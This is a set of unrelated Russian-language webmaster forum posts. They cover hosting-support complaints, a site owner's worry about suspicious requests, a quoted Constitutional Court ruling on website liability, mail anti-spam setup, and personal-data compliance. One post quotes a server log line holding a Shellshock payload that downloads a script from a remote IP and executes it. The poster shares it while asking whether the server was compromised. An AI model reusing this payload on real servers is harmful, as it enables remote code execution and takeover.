Так а кому 2domains то принадлежит. Посмотрите в ЕГРЮЛ
Поддержка 2domains = поддержка Рег.ру. Пишите сразу в Рег.ру
С РЕГ.РУ явно что-то не то...
Написал, как обычно им на почту, мне пришло письмо, смысл которого "Мы больше не принимаем заявки по почте, иди проходи квест на сайте, чтобы нам написать."
Пошел на сайт. Полчаса искал куда же мне зайти, чтобы в итоге появилась форма отдела, который мне нужен
У них есть support@, manager@, cloud@, hosting@ - все разные очереди. Написать просто так на почту уже нельзя. На сайте если ткнуть в первую попавшуюся тему и написать туда вопрос по хостингу, он может утий к манагерам, у которых может быть уже не рабочее время или выходной. И нужно ждать, когда они придут на работу и перекинут тикет в очередь хостинга...
Короче, "все для людей" в очередной раз...
Спасибо.
Догадка насчет взлома не подтвердилась. Подобные запросы в логах уже как месяц (нацеленные на уязвимость bash). А непонятные POST запросы только второй день...
Все же непонятна цель этих запросов... Генерация входящего трафика только, даже вред не наносит никакой на первый взгляд.
Максимально с одинакового IP было 135. Иногда идут с одного сразу 3-5-10 раз подряд.
Посчитал и выделил пул в ~230 IP, с которых запросы были больше всего раз. Но очень много, с которых всего по одному-два раза был запрос.---------- Добавлено 20.12.2014 в 21:41 ----------Просто боюсь, может ломанули, превратили в бот и теперь шлют "команды", т.к. заметил в логах ошибок такую запись:
1.9.153.65 - - [20/Dec/2014:04:08:38 +0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 361 "-" "() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1"
Полез смотреть, ShellShock конечно же не исправлен был, bash старый. Но на сервере нет ни perl, ни FastCGI - вроде не должно было сработать (как мне сказали)... А так не уверен.---------- Добавлено 20.12.2014 в 21:45 ----------Содержание того файла, который пытались загрузить через уязвимость bash, приведено тут - http://jrnerqbbzrq.blogspot.ru/2014/12/a-little-shellshock-fun.html
Не знаю что он делает, не спец :)
RewriteCond %{REQUEST_METHOD} POST
RewriteRule ^index.php$ - [L,F]
А если запросы POST а не GET - разве такие страницы появятся? По факту url же не меняется никак...
Каталог фирм собственной разработки или сторонней?
Рекомендую почитать Постановления Конституционного Суда РФ от 9 июля 2013 г. по вопросам распространения порочащей информации в сети Интернет.
Вот выжимка из него:
Согласно общепризнанным принципам и нормам международного права и в соответствии с Конституцией Российской Федерации каждому в Российской Федерации гарантируется свобода мысли и слова, право свободно искать, получать, передавать, производить и распространять информацию любым законным способом (статья 29, части 1 и 4, Конституции Российской Федерации). Право каждого человека на свободное выражение своего мнения, включая свободу искать, получать и распространять всякого рода информацию, идеи независимо от государственных границ, устно, письменно, посредством печати или иными способами по своему выбору, закреплено Международным пактом о гражданских и политических правах.
Действующее законодательство, в частности статьи 152 и 1100 ГК Российской Федерации, закрепляет возможность правовой защиты от распространения сведений, порочащих честь и достоинство граждан или деловую репутацию граждан и юридических лиц, под которым - в силу Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации" и в соответствии с разъяснениями, данными Верховным Судом Российской Федерации, - следует понимать, помимо прочего, их распространение посредством сети "Интернет".
Что касается ответственности лиц, обеспечивающих размещение информации и доступ к ней на сайтах в сети "Интернет", не являющихся средствами массовой информации, за нарушения законодательства, допущенные при использовании соответствующих ресурсов третьими лицами, то она действующим законодательством не предусмотрена. Такой подход вытекает из общих принципов юридической ответственности, необходимое основание которой образует наличие состава правонарушения и, соответственно, вины как элемента его субъективной стороны. Наличие вины, согласно правовой позиции Конституционного Суда Российской Федерации, - общий и общепризнанный принцип юридической ответственности во всех отраслях права, и всякое исключение из него должно быть выражено прямо и недвусмысленно, т.е. закреплено непосредственно в законе (постановления от 25 января 2001 года N 1-П, от 17 июля 2002 года N 13-П, от 18 мая 2012 года N 12-П, от 14 февраля 2013 года N 4-П и др.).
Между тем в силу пункта 2 части 3 статьи 17 Федерального закона "Об информации, информационных технологиях и о защите информации" лицо, оказывающее услуги по хранению информации и обеспечению доступа к ней, не несет гражданско-правовой ответственности за распространение информации, если оно не могло знать о незаконности такого распространения. Приведенное регулирование соотносится с правом каждого свободно распространять информацию любым законным способом, которое признается и защищается Конституцией Российской Федерации (статья 29, часть 4), Международным пактом о гражданских и политических правах (статья 19), Конвенцией о защите прав человека и основных свобод (статья 10), а также - применительно к распространению информации через сеть "Интернет" - в ряде других международно-правовых актов. Так, ни одно лицо, которое предоставляет лишь технические интернет-услуги, такие как обеспечение доступа или поиск, передача или кэширование информации, не должно нести ответственности за созданный другими лицами контент, который был распространен при помощи этих услуг, если это лицо не вносило в него изменений и не отказывалось выполнить судебное решение об удалении данного контента в случаях, когда оно имеет возможность это сделать.
Равным образом гражданин, в отношении которого были распространены порочащие сведения на сайте в сети "Интернет", вправе обратиться в суд с требованием об обязании его владельца или уполномоченного лица, которое ответственно за размещение информации на этом сайте, удалить эти сведения как не соответствующие действительности, что предполагает установление данного обстоятельства непосредственно в ходе рассмотрения искового заявления. Вместе с тем владелец сайта или уполномоченное им лицо - поскольку они объективно ограничены в возможности определять достоверность информации, размещаемой на сайте третьими лицами, притом что возложение на них такой проверки означало бы отступление от конституционных гарантий свободы слова, - не могут быть безусловно обязаны удалять порочащие гражданина сведения, если их недостоверность небесспорна, в частности не установлена судебным решением, а следовательно, в таких случаях до принятия судебного решения на них не может быть возложена и ответственность за отказ удалить соответствующую информацию с сайта.
Как сделано у меня:
В PTR стоит запись типа mail.maindomain.ru, в HELO на почтовике отдается тоже самое имя (важно для некоторых почтовых сервисов). Ну и в SPF каждого домена прописан IP адрес сервера. Плюс еще на сервере настроена DKIM подпись на каждый домен.
Итог - ни одного письма в спаме ни на одном почтовом сервисе даже при массовых рассылках.
А зачем его обходить, когда можно все сделать по закону и спать спокойно? И да, регистрироваться в качестве оператора - бесплатно совершенно. Подаете заявление в Роскомнадзор на двух листах - и Вы уже оператор. Даже платить ничего не нужно.
У нас на соблюдение требований ФЗ-152 ушло листов 500 бумаги (очень много всяких документов печатать нужно), один черный картридж для принтера, и примерно дня три работы одного человека.
Роскомнадзор приезжал с выездной проверкой требований в области обработки персональных данных. Итог - акт с формулировкой "нарушений ФЗ-152 в области обработки персональных данных не выявлено".
Более 50 000 клиентов, с ФИО, паспортом, адресом, телефоном.
